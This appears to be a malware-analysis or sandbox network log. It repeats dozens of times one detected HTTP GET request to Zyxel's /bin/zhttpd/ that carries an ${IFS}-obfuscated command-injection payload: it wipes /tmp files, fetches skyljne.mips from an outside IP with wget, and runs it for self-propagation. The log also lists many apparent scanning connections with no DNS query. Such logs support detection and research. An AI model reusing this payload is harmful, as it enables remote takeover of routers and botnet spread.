            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 41.61.170.141
            Source: unknownTCP traffic detected without corresponding DNS query: 157.164.81.115
            Source: unknownTCP traffic detected without corresponding DNS query: 157.88.102.17
            Source: unknownTCP traffic detected without corresponding DNS query: 197.69.208.140
            Source: unknownTCP traffic detected without corresponding DNS query: 197.175.96.252
            Source: unknownTCP traffic detected without corresponding DNS query: 197.162.129.149
            Source: unknownTCP traffic detected without corresponding DNS query: 41.177.67.31
            Source: unknownTCP traffic detected without corresponding DNS query: 152.33.147.255
            Source: unknownTCP traffic detected without corresponding DNS query: 41.145.217.125
            Source: unknownTCP traffic detected without corresponding DNS query: 157.50.114.163
            Source: unknownTCP traffic detected without corresponding DNS query: 41.27.103.226
            Source: unknownTCP traffic detected without corresponding DNS query: 86.27.184.232
            Source: unknownTCP traffic detected without corresponding DNS query: 157.124.59.218
            Source: unknownTCP traffic detected without corresponding DNS query: 116.243.201.102
            Source: unknownTCP traffic detected without corresponding DNS query: 157.129.95.68
            Source: unknownTCP traffic detected without corresponding DNS query: 41.201.139.66
            Source: unknownTCP traffic detected without corresponding DNS query: 102.114.177.202
            Source: unknownTCP traffic detected without corresponding DNS query: 41.120.27.18
            Source: unknownTCP traffic detected without corresponding DNS query: 41.242.30.0
            Source: unknownTCP traffic detected without corresponding DNS query: 174.248.173.16
            Source: unknownTCP traffic detected without corresponding DNS query: 64.128.21.208
            Source: unknownTCP traffic detected without corresponding DNS query: 157.141.34.204
            Source: unknownTCP traffic detected without corresponding DNS query: 41.170.176.159
            Source: unknownTCP traffic detected without corresponding DNS query: 41.60.107.215
            Source: unknownTCP traffic detected without corresponding DNS query: 146.19.45.20
            Source: unknownTCP traffic detected without corresponding DNS query: 157.35.28.251
            Source: unknownTCP traffic detected without corresponding DNS query: 18.190.159.223
            Source: unknownTCP traffic detected without corresponding DNS query: 41.222.39.49
            Source: unknownTCP traffic detected without corresponding DNS query: 41.59.198.137
            Source: unknownTCP traffic detected without corresponding DNS query: 197.140.236.1
            Source: unknownTCP traffic detected without corresponding DNS query: 197.32.51.254
            Source: unknownTCP traffic detected without corresponding DNS query: 41.53.123.43
            Source: unknownTCP traffic detected without corresponding DNS query: 197.97.160.29
            Source: unknownTCP traffic detected without corresponding DNS query: 157.67.15.130
            Source: unknownTCP traffic detected without corresponding DNS query: 197.215.21.54
            Source: unknownTCP traffic detected without corresponding DNS query: 157.54.54.54
            Source: unknownTCP traffic detected without corresponding DNS query: 157.226.235.38
            Source: unknownTCP traffic detected without corresponding DNS query: 41.31.36.174
            Source: unknownTCP traffic detected without corresponding DNS query: 197.185.116.53
            Source: unknownTCP traffic detected without corresponding DNS query: 197.64.2.97
            Source: unknownTCP traffic detected without corresponding DNS query: 165.116.121.128
            Source: unknownTCP traffic detected without corresponding DNS query: 197.239.236.161
            Source: unknownTCP traffic detected without corresponding DNS query: 41.126.167.61
            Source: unknownTCP traffic detected without corresponding DNS query: 157.29.150.72
            Source: unknownTCP traffic detected without corresponding DNS query: 41.53.34.6
            Source: unknownTCP traffic detected without corresponding DNS query: 157.7.5.11
            Source: unknownTCP traffic detected without corresponding DNS query: 155.146.18.107
            Source: unknownTCP traffic detected without corresponding DNS query: 196.130.209.72
            Source: unknownTCP traffic detected without corresponding DNS query: 41.108.152.178
            Source: unknownTCP traffic detected without corresponding DNS query: 41.48.165.196
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
